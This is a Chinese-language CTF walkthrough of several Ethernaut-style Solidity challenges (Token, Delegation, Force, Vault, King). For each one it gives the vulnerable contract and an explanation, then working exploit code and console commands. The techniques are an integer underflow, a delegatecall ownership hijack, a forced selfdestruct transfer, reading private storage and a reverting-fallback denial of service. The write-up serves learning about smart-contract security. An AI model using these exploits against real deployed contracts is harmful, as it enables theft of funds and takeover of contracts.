目标:获取更多的 token
pragma solidity ^0.4.18; contract Token { mapping(address => uint) balances; uint public totalSupply; function Token(uint _initialSupply) public { balances[msg.sender] = totalSupply = _initialSupply; }//构造函数,在一开始给合约一些钱 function transfer(address _to, uint _value) public returns (bool) { require(balances[msg.sender] - _value >= 0);//先检查调用者的余额是不是大于转账金额 balances[msg.sender] -= _value;//调用的人减金额_value balances[_to] += _value;//给目标增加金额_value return true; }//转账 function balanceOf(address _owner) public view returns (uint balance) { return balances[_owner]; }//查询余额 }
一开始是这样的,初始合约是 20,当我们转一个比 20 大的数的时候 20-_value 就会下溢
uint256 的取值范围是 [0-2^256-1],所以如果我们转 21 的话 20-21 = -1,也就是过了 0 到了 2^256-1
await contract.transfer('0x3C7f1E9B49B2f7c92e25224199d05D5Cb6923820',30)
随便找个地址转账(我把我地址最后一位改成了0)完了之后是这样的,提交就可以啦
目标:拥有所有权
pragma solidity ^0.4.18; contract Delegate { address public owner; function Delegate(address _owner) public { owner = _owner; }//构造函数 function pwn() public { owner = msg.sender; }//如果能调用这个pwn函数就可以了 } contract Delegation { address public owner; Delegate delegate; function Delegation(address _delegateAddress) public { delegate = Delegate(_delegateAddress);//把合约给实例化了 owner = msg.sender; } function() public { if(delegate.delegatecall(msg.data)) { this; }//fallback函数,其中的delegatecall跟call的区别在于 //前者所调用的函数在本合约中执行的,其他的信息都是自己合约的,相当于把函数拷贝到当前合约来执行 } }
我们要做的就是通过 delegatecall 来调用 pwn 函数,正如注释中说的那样,delegatecall 函数需要所用到的信息比如代码中的 msg.sender 就是这个合约的,所以只要我们构造一下 msg.data 就能够去调用 pwn 函数
当给 call 传入的第一个参数是 4 字节的时候,call 就会把这个参数作为要调用的函数,这个参数在以太坊的函数选择器的生成规则里是函数签名的 sha3 的前 4 个字节,接下来我们要做的就是触发回退函数,来执行 pwn 函数
可以使用 sendTransaction:
contract.sendTransaction({data:web3.sha3("pwn()").slice(0,10)});
slice 为提取字符串的前10个字符,四个字节,就是 10 个字符(例:0x34567890)
目标:让合约中有钱
pragma solidity ^0.4.18; contract Force {/* MEOW ? /\_/\ / ____/ o o \ /~____ =ø= / (______)__m_m) */}
什么代码都没有,但是有一种自毁合约的方法 selfdestruct,这种方法会把合约中剩余的钱强制转到某一个地址
在 remix 里面部署一个合约
pragma solidity ^0.4.20; contract exp { function exp() public payable {} function exploit(address _target) public { selfdestruct(_target); } }
调用 exploit 函数,自毁合约,同时把地址填成题目的合约地址
余额已经不是 0 了
这时候提交就可以啦
目标:解锁 vault
pragma solidity ^0.4.18; contract Vault { bool public locked; bytes32 private password;//定义了一个密码 function Vault(bytes32 _password) public { locked = true;//构造函数,locked为true password = _password;//定义了一个password } function unlock(bytes32 _password) public { if (password == _password) { locked = false;//如果输入的密码正确就可以解锁 } } }
只要密码对了就行,我们不知道它定义的密码是什么,而且 password 变量是 private 的,但是在区块里面数据是透明的,私有变量标记只能阻止其他合约访问它。标记为私有变量或局部变量的状态变量,仍然可被公开访问到
getStorageAt 第一个参数是合约地址,后面是参数的位置,参数的位置是按照声明的顺序来排的,这里的 locked 是第一个所以是 0,password 是第二个,位置就是 1
web3.eth.getStorageAt(contract.address, 1, function(x, y) {alert(web3.toAscii(y))})
//可以 alert 的方式将该地址的第 2 个值转化 ascii 显示
web3.eth.getStorageAt(contract.address, 1, function(x, y){console.info(web3.toAscii(y))})
//也可以在控制台直接输出
提交
await contract.unlock("A very strong secret password :)")
查看一下,已经解锁了,提交就可以了
pragma solidity ^0.4.18; import 'zeppelin-solidity/contracts/ownership/Ownable.sol'; contract King is Ownable { address public king; uint public prize; function King() public payable { king = msg.sender;//构造函数,king是创建者 prize = msg.value;//prize是创建者发送的金额 } function() external payable { require(msg.value >= prize || msg.sender == owner); //要求发送的金额大于等于king的金额或发送者是合约拥有着 king.transfer(msg.value);//把的转账给目前的king king = msg.sender;//king变成msg.sender prize = msg.value;//prize是现在这个king发送的金额数 } }
谁发送大于 king 的金额就能成为新的 king,但是要先把之前的国王的钱退回去才能更改 king。只要我们一直不接受退回的奖金,那我们就能够一直保持 king 的身份
pragma solidity ^0.4.18; contract attack{ function attack(address _addr) public payable{ _addr.call.gas(10000000).value(msg.value)(); //先给合约一些钱,使得我们成为king } function () public { revert(); } }
用 remix 部署合约,只需要构造一个没有 payable 的回退函数,就接收不到金额了
king 变成了攻击合约的地址(我截图乱套了,不知道哪一次的了,反正是通过了)